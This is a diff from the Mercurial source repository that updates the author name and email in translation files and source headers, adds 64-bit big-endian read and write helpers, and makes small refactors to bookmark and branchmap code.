msgstr ""
-"Copyright (C) 2005-2014 Matt Mackall und andere\n"
+"Copyright (C) 2005-2014 Olivia Mackall und andere\n"
"Dies ist freie Software; siehe Quellen für Kopierbestimmungen. Es besteht\n"
"KEINE Gewährleistung für das Programm, nicht einmal der Marktreife oder der\n"
"Verwendbarkeit für einen bestimmten Zweck.\n"
@@ -18893,7 +18893,7 @@
msgstr ""
msgid ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
@@ -19032,7 +19032,7 @@
msgid ""
"Author\n"
"\"\"\"\"\"\"\n"
-"Written by Matt Mackall <mpm@selenic.com>"
+"Written by Olivia Mackall <olivia@selenic.com>"
msgstr ""
msgid ""
@@ -19050,7 +19050,7 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2014 Matt Mackall.\n"
+"Copyright (C) 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
@@ -19088,7 +19088,7 @@
"Vadim Gelfer <vadim.gelfer@gmail.com>"
msgstr ""
-msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>."
+msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>."
msgstr ""
msgid ""
@@ -19101,7 +19101,7 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2006 Vadim Gelfer.\n"
-"Mercurial is copyright 2005-2014 Matt Mackall.\n"
+"Mercurial is copyright 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
@@ -19307,7 +19307,7 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial is copyright 2005-2014 Matt Mackall.\n"
+"Mercurial is copyright 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
--- a/i18n/el.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/el.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# Greek translations for Mercurial
# Ελληνική μετάφραση των μηνυμάτων του Mercurial
#
-# Copyright (C) 2009 Matt Mackall και άλλοι
+# Copyright (C) 2009 Olivia Mackall και άλλοι
#
msgid ""
msgstr ""
@@ -7606,12 +7606,12 @@
msgid ""
"\n"
-"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n"
+"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
"\n"
-"Πνευματικά δικαιώματα (C) 2005-2009 Matt Mackall <mpm@selenic.com> και άλλοι\n"
+"Πνευματικά δικαιώματα (C) 2005-2009 Olivia Mackall <olivia@selenic.com> και άλλοι\n"
"Αυτό το πρόγραμμα είναι ελεύθερο λογισμικό· δείτε τον πηγαίο κώδικα για\n"
"την άδεια χρήσης του. Δεν παρέχεται ΚΑΜΙΑ εγγύηση· ούτε καν για την\n"
"ΕΜΠΟΡΕΥΣΙΜΟΤΗΤΑ ή την ΚΑΤΑΛΛΗΛΟΤΗΤΑ ΓΙΑ ΚΑΠΟΙΟ ΣΚΟΠΟ.\n"
--- a/i18n/fr.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/fr.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# French translations for Mercurial
# Traductions françaises de Mercurial
-# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others
#
# Quelques règles :
# - dans l'aide d'une commande, la première ligne descriptive
@@ -9412,7 +9412,7 @@
msgid ""
"\n"
-"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n"
+"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
--- a/i18n/hggettext Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/hggettext Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# hggettext - carefully extract docstrings for Mercurial
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/i18n/it.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/it.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# Italian translations for Mercurial
# Traduzione italiana per Mercurial
-# Copyright (C) 2009 Matt Mackall and others
+# Copyright (C) 2009 Olivia Mackall and others
msgid ""
msgstr ""
"Project-Id-Version: Mercurial\n"
@@ -8881,11 +8881,11 @@
msgstr ""
msgid ""
-"Copyright (C) 2005-2011 Matt Mackall and others\n"
+"Copyright (C) 2005-2011 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2011 Matt Mackall e altri\n"
+"Copyright (C) 2005-2011 Olivia Mackall e altri\n"
"Questo è software libero; vedere i sorgenti per le condizioni di copia.\n"
"Non c'è ALCUNA garanzia; neppure di COMMERCIABILITÀ o IDONEITÀ AD UNO\n"
"SCOPO PARTICOLARE.\n"
--- a/i18n/ja.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/ja.po Tue Apr 20 11:01:06 2021 -0400
@@ -18771,11 +18771,11 @@
msgstr "(詳細は https://mercurial-scm.org を参照)"
msgid ""
-"Copyright (C) 2005-2018 Matt Mackall and others\n"
+"Copyright (C) 2005-2018 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2018 Matt Mackall and others\n"
+"Copyright (C) 2005-2018 Olivia Mackall and others\n"
"本製品はフリーソフトウェアです。\n"
"頒布条件に関しては同梱されるライセンス条項をお読みください。\n"
"市場適合性や特定用途への可否を含め、 本製品は無保証です。\n"
@@ -30239,11 +30239,11 @@
msgid ""
"Author\n"
"\"\"\"\"\"\"\n"
-"Written by Matt Mackall <mpm@selenic.com>"
+"Written by Olivia Mackall <olivia@selenic.com>"
msgstr ""
"著者\n"
"\"\"\"\"\n"
-"Matt Mackall <mpm@selenic.com>"
+"Olivia Mackall <olivia@selenic.com>"
msgid ""
"Resources\n"
@@ -30264,13 +30264,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
"Public License の元での自由な利用が保証されています。"
@@ -30293,12 +30293,12 @@
"----------------------------------"
msgid ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
msgstr ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
@@ -30471,13 +30471,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2018 Matt Mackall.\n"
+"Copyright (C) 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
"Public License の元での自由な利用が保証されています。"
@@ -30519,8 +30519,8 @@
"====\n"
"本マニュアルページの著者は Vadim Gelfer <vadim.gelfer@gmail.com> です。"
-msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>."
-msgstr "Mercurial の著者は Matt Mackall <mpm@selenic.com> です。"
+msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>."
+msgstr "Mercurial の著者は Olivia Mackall <olivia@selenic.com> です。"
msgid ""
"See Also\n"
@@ -30536,14 +30536,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2006 Vadim Gelfer.\n"
-"Mercurial is copyright 2005-2018 Matt Mackall.\n"
+"Mercurial is copyright 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Copying\n"
"=======\n"
"本マニュアルページの著作権は copyright 2006 Vadim Gelfer です。\n"
-"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n"
+"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n"
"本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
"Public License の元での自由な利用が保証されています。"
@@ -30825,14 +30825,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial is copyright 2005-2018 Matt Mackall.\n"
+"Mercurial is copyright 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Copying\n"
"=======\n"
"本マニュアルの著作権は copyright 2005 Bryan O'Sullivan です。\n"
-"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n"
+"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n"
"本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
"Public License の元での自由な利用が保証されています。"
@@ -39790,13 +39790,13 @@
#~ msgid ""
#~ "Copying\n"
#~ "\"\"\"\"\"\"\"\n"
-#~ "Copyright (C) 2005-2017 Matt Mackall.\n"
+#~ "Copyright (C) 2005-2017 Olivia Mackall.\n"
#~ "Free use of this software is granted under the terms of the GNU General\n"
#~ "Public License version 2 or any later version."
#~ msgstr ""
#~ "Copying\n"
#~ "\"\"\"\"\"\"\"\n"
-#~ "Copyright (C) 2005-2017 Matt Mackall.\n"
+#~ "Copyright (C) 2005-2017 Olivia Mackall.\n"
#~ "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
#~ "Public License の元での自由な利用が保証されています。"
--- a/i18n/pt_BR.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/pt_BR.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# Brazilian Portuguese translations for Mercurial
# Traduções do Mercurial para português do Brasil
-# Copyright (C) 2011 Matt Mackall and others
+# Copyright (C) 2011 Olivia Mackall and others
#
# Translators:
# Diego Oliveira <diego@diegooliveira.com>
@@ -19269,11 +19269,11 @@
msgstr "(veja https://mercurial-scm.org para mais informações)"
msgid ""
-"Copyright (C) 2005-2018 Matt Mackall and others\n"
+"Copyright (C) 2005-2018 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2018 Matt Mackall e outros\n"
+"Copyright (C) 2005-2018 Olivia Mackall e outros\n"
"Este software é livre; veja os fontes para condições de cópia. Não\n"
"há garantias, nem mesmo de adequação para qualquer propósito em\n"
"particular.\n"
@@ -31340,11 +31340,11 @@
msgid ""
"Author\n"
"\"\"\"\"\"\"\n"
-"Written by Matt Mackall <mpm@selenic.com>"
+"Written by Olivia Mackall <olivia@selenic.com>"
msgstr ""
"Autor\n"
"\"\"\"\"\"\n"
-"Escrito por Matt Mackall <mpm@selenic.com>"
+"Escrito por Olivia Mackall <olivia@selenic.com>"
msgid ""
"Resources\n"
@@ -31367,13 +31367,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Cópia\n"
"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"Garante-se livre uso deste software nos termos da licença\n"
"GNU General Public License, versão 2 ou qualquer versão posterior."
@@ -31396,12 +31396,12 @@
"----------------------------------------------------"
msgid ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
msgstr ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
@@ -31581,13 +31581,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2018 Matt Mackall.\n"
+"Copyright (C) 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Cópia\n"
"\"\"\"\"\"\n"
-"Copyright (C) 2005-2018 Matt Mackall.\n"
+"Copyright (C) 2005-2018 Olivia Mackall.\n"
"Garante-se livre uso deste software nos termos da licença\n"
"GNU General Public License, versão 2 ou qualquer versão posterior."
@@ -31629,8 +31629,8 @@
"=====\n"
"Vadim Gelfer <vadim.gelfer@gmail.com>"
-msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>."
-msgstr "Mercurial foi escrito por Matt Mackall <mpm@selenic.com>."
+msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>."
+msgstr "Mercurial foi escrito por Olivia Mackall <olivia@selenic.com>."
msgid ""
"See Also\n"
@@ -31645,14 +31645,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2006 Vadim Gelfer.\n"
-"Mercurial is copyright 2005-2018 Matt Mackall.\n"
+"Mercurial is copyright 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Cópia\n"
"=====\n"
"Esta página de manual: copyright 2006 Vadim Gelfer.\n"
-"Mercurial: copyright 2005-2018 Matt Mackall.\n"
+"Mercurial: copyright 2005-2018 Olivia Mackall.\n"
"Garante-se livre uso deste software nos termos da licença\n"
"GNU General Public License, versão 2 ou qualquer versão posterior."
@@ -31928,14 +31928,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial is copyright 2005-2018 Matt Mackall.\n"
+"Mercurial is copyright 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Cópia\n"
"=====\n"
"Esta página de manual: copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial: copyright 2005-2018 Matt Mackall.\n"
+"Mercurial: copyright 2005-2018 Olivia Mackall.\n"
"Garante-se livre uso deste software nos termos da licença\n"
"GNU General Public License, versão 2 ou qualquer versão posterior."
@@ -41308,13 +41308,13 @@
#~ msgid ""
#~ "Copying\n"
#~ "\"\"\"\"\"\"\"\n"
-#~ "Copyright (C) 2005-2017 Matt Mackall.\n"
+#~ "Copyright (C) 2005-2017 Olivia Mackall.\n"
#~ "Free use of this software is granted under the terms of the GNU General\n"
#~ "Public License version 2 or any later version."
#~ msgstr ""
#~ "Cópia\n"
#~ "\"\"\"\"\"\n"
-#~ "Copyright (C) 2005-2017 Matt Mackall.\n"
+#~ "Copyright (C) 2005-2017 Olivia Mackall.\n"
#~ "Garante-se livre uso deste software nos termos da licença\n"
#~ "GNU General Public License, versão 2 ou qualquer versão posterior."
--- a/i18n/ro.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/ro.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# Romanian translation for Mercurial
# Traducerea în limba română pentru Mercurial
#
-# Copyright (C) 2010 Matt Mackall <mpm@selenic.com> and others
+# Copyright (C) 2010 Olivia Mackall <olivia@selenic.com> and others
#
#
# Glosar de traduceri
@@ -10032,11 +10032,11 @@
msgstr "(vezi http://mercurial.selenic.com pentru mai multe informații)"
msgid ""
-"Copyright (C) 2005-2011 Matt Mackall and others\n"
+"Copyright (C) 2005-2011 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2011 Matt Mackall și alții\n"
+"Copyright (C) 2005-2011 Olivia Mackall și alții\n"
"Acesta este software liber; vezi sursa pentru condițiile de copiere.\n"
"Nu există NICIO garanție; nici măcar pentru COMERCIALIZARE sau\n"
"COMPATIBILITATE ÎN ANUMITE SCOPURI.\n"
--- a/i18n/ru.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/ru.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
# Russian translations for Mercurial package.
-# Copyright (C) 2011 Matt Mackall <mpm@selenic.com> and others
+# Copyright (C) 2011 Olivia Mackall <olivia@selenic.com> and others
# This file is distributed under the same license as the Mercurial package.
# === Glossary ===
#
@@ -15590,11 +15590,11 @@
msgstr "(подробнее см. http://mercurial.selenic.com)"
msgid ""
-"Copyright (C) 2005-2014 Matt Mackall and others\n"
+"Copyright (C) 2005-2014 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"(С) 2005-2014 Matt Mackall и другие.\n"
+"(С) 2005-2014 Olivia Mackall и другие.\n"
"Это свободное ПО; условия распространения см. в исходном коде.\n"
"НИКАКИХ ГАРАНТИЙ НЕ ПРЕДОСТАВЛЯЕТСЯ, в том числе на пригодность для\n"
"коммерческого использования и для решения конкретных задач.\n"
@@ -21807,7 +21807,7 @@
# NOT SURE should this be translated?
msgid ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
@@ -22000,11 +22000,11 @@
msgid ""
"Author\n"
"\"\"\"\"\"\"\n"
-"Written by Matt Mackall <mpm@selenic.com>"
+"Written by Olivia Mackall <olivia@selenic.com>"
msgstr ""
"Автор\n"
"\"\"\"\"\"\n"
-"Matt Mackall <mpm@selenic.com>"
+"Olivia Mackall <olivia@selenic.com>"
msgid ""
"Resources\n"
@@ -22024,13 +22024,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2014 Matt Mackall.\n"
+"Copyright (C) 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Копирование\n"
"\"\"\"\"\"\"\"\"\"\"\"\n"
-"(C) 2005-2014 Matt Mackall.\n"
+"(C) 2005-2014 Olivia Mackall.\n"
"Свободное использование этого ПО возможно в соответствии с \n"
"Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше."
@@ -22068,8 +22068,8 @@
"=====\n"
"Vadim Gelfer <vadim.gelfer@gmail.com>"
-msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>."
-msgstr "Mercurial написан Matt Mackall <mpm@selenic.com>."
+msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>."
+msgstr "Mercurial написан Olivia Mackall <olivia@selenic.com>."
msgid ""
"See Also\n"
@@ -22084,14 +22084,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2006 Vadim Gelfer.\n"
-"Mercurial is copyright 2005-2014 Matt Mackall.\n"
+"Mercurial is copyright 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Копирование\n"
"===========\n"
"Правами на данную страницу обладает (с) 2006 Vadim Gelfer\n"
-"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n"
+"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n"
"Свободное использование этого ПО возможно в соответствии с \n"
"Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше."
@@ -22346,14 +22346,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial is copyright 2005-2014 Matt Mackall.\n"
+"Mercurial is copyright 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Копирование\n"
"===========\n"
"Правами на данную страницу обладает (с) 2005 Bryan O'Sullivan\n"
-"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n"
+"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n"
"Свободное использование этого ПО возможно в соответствии с \n"
"Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше."
--- a/i18n/sv.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/sv.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# Swedish translation for Mercurial
# Svensk översättning för Mercurial
-# Copyright (C) 2009-2012 Matt Mackall and others
+# Copyright (C) 2009-2012 Olivia Mackall and others
#
# Translation dictionary:
#
@@ -12413,11 +12413,11 @@
msgstr "(se http://mercurial.selenic.com för mer information)"
msgid ""
-"Copyright (C) 2005-2012 Matt Mackall and others\n"
+"Copyright (C) 2005-2012 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2012 Matt Mackall och andra\n"
+"Copyright (C) 2005-2012 Olivia Mackall och andra\n"
"Detta är fri mjukvara; se källkoden för kopieringsvillkor. Det ges INGEN\n"
"garanti; inte ens för SÄLJBARHET eller ATT PASSA FÖR ETT VISST ÄNDAMÅL.\n"
--- a/i18n/zh_CN.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/zh_CN.po Tue Apr 20 11:01:06 2021 -0400
@@ -7409,12 +7409,12 @@
msgid ""
"\n"
-"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n"
+"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
"\n"
-"版权所有 (C) 2005-2010 Matt Mackall <mpm@selenic.com> 和其他人。\n"
+"版权所有 (C) 2005-2010 Olivia Mackall <olivia@selenic.com> 和其他人。\n"
"这是自由软件,具体参见版权条款。这里没有任何担保,甚至没有适合\n"
"特定目的的隐含的担保。\n"
--- a/i18n/zh_TW.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/zh_TW.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
# Traditional Chinese translation for Mercurial
-# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others
# This file is distributed under the same license as the Mercurial package.
# Chia-Huan Wu <willie.tw@gmail.com>, 2009.
#
@@ -8191,7 +8191,7 @@
msgstr "\tSee 'hg help urls' for more information."
msgid ""
-"Copyright (C) 2005-2010 Matt Mackall and others\n"
+"Copyright (C) 2005-2010 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
--- a/mercurial/ancestor.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/ancestor.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# ancestor.py - generic DAG ancestor algorithm for mercurial
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/bdiff.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bdiff.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
bdiff.c - efficient binary diff extension for Mercurial
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+ Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
--- a/mercurial/bitmanipulation.h Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bitmanipulation.h Tue Apr 20 11:01:06 2021 -0400
@@ -5,6 +5,18 @@
#include "compat.h"
+/* Reads a 64 bit integer from big-endian bytes. Assumes that the data is long
+ enough */
+static inline uint64_t getbe64(const char *c)
+{
+ const unsigned char *d = (const unsigned char *)c;
+
+ return ((((uint64_t)d[0]) << 56) | (((uint64_t)d[1]) << 48) |
+ (((uint64_t)d[2]) << 40) | (((uint64_t)d[3]) << 32) |
+ (((uint64_t)d[4]) << 24) | (((uint64_t)d[5]) << 16) |
+ (((uint64_t)d[6]) << 8) | (d[7]));
+}
+
static inline uint32_t getbe32(const char *c)
{
const unsigned char *d = (const unsigned char *)c;
@@ -27,6 +39,20 @@
return ((d[0] << 8) | (d[1]));
}
+/* Writes a 64 bit integer to bytes in a big-endian format.
+ Assumes that the buffer is long enough */
+static inline void putbe64(uint64_t x, char *c)
+{
+ c[0] = (x >> 56) & 0xff;
+ c[1] = (x >> 48) & 0xff;
+ c[2] = (x >> 40) & 0xff;
+ c[3] = (x >> 32) & 0xff;
+ c[4] = (x >> 24) & 0xff;
+ c[5] = (x >> 16) & 0xff;
+ c[6] = (x >> 8) & 0xff;
+ c[7] = (x)&0xff;
+}
+
static inline void putbe32(uint32_t x, char *c)
{
c[0] = (x >> 24) & 0xff;
--- a/mercurial/bookmarks.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bookmarks.py Tue Apr 20 11:01:06 2021 -0400
@@ -27,6 +27,9 @@
txnutil,
util,
)
+from .utils import (
+ urlutil,
+)
# label constants
# until 3.5, bookmarks.current was the advertised name, not
@@ -597,10 +600,10 @@
# try to use an @pathalias suffix
# if an @pathalias already exists, we overwrite (update) it
if path.startswith(b"file:"):
- path = util.url(path).path
+ path = urlutil.url(path).path
for p, u in ui.configitems(b"paths"):
if u.startswith(b"file:"):
- u = util.url(u).path
+ u = urlutil.url(u).path
if path == u:
return b'%s@%s' % (b, p)
@@ -623,7 +626,7 @@
_binaryentry = struct.Struct(b'>20sH')
-def binaryencode(bookmarks):
+def binaryencode(repo, bookmarks):
"""encode a '(bookmark, node)' iterable into a binary stream
the binary format is:
@@ -645,7 +648,7 @@
return b''.join(binarydata)
-def binarydecode(stream):
+def binarydecode(repo, stream):
"""decode a binary stream into an '(bookmark, node)' iterable
the binary format is:
--- a/mercurial/branchmap.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/branchmap.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# branchmap.py - logic to computes, maintain and stores branchmap for local repo
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -39,6 +39,7 @@
Tuple,
Union,
)
+ from . import localrepo
assert any(
(
@@ -51,6 +52,7 @@
Set,
Tuple,
Union,
+ localrepo,
)
)
@@ -97,7 +99,7 @@
revs.extend(r for r in extrarevs if r <= bcache.tiprev)
else:
# nothing to fall back on, start empty.
- bcache = branchcache()
+ bcache = branchcache(repo)
revs.extend(cl.revs(start=bcache.tiprev + 1))
if revs:
@@ -129,6 +131,7 @@
if rbheads:
rtiprev = max((int(clrev(node)) for node in rbheads))
cache = branchcache(
+ repo,
remotebranchmap,
repo[rtiprev].node(),
rtiprev,
@@ -184,6 +187,7 @@
def __init__(
self,
+ repo,
entries=(),
tipnode=nullid,
tiprev=nullrev,
@@ -191,10 +195,11 @@
closednodes=None,
hasnode=None,
):
- # type: (Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None
+ # type: (localrepo.localrepository, Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None
"""hasnode is a function which can be used to verify whether changelog
has a given node or not. If it's not provided, we assume that every node
we have exists in changelog"""
+ self._repo = repo
self.tipnode = tipnode
self.tiprev = tiprev
self.filteredhash = filteredhash
@@ -280,6 +285,7 @@
if len(cachekey) > 2:
filteredhash = bin(cachekey[2])
bcache = cls(
+ repo,
tipnode=last,
tiprev=lrev,
filteredhash=filteredhash,
@@ -386,6 +392,7 @@
def copy(self):
"""return an deep copy of the branchcache object"""
return type(self)(
+ self._repo,
self._entries,
self.tipnode,
self.tiprev,
@@ -564,6 +571,7 @@
# [4 byte hash prefix][4 byte branch name number with sign bit indicating open]
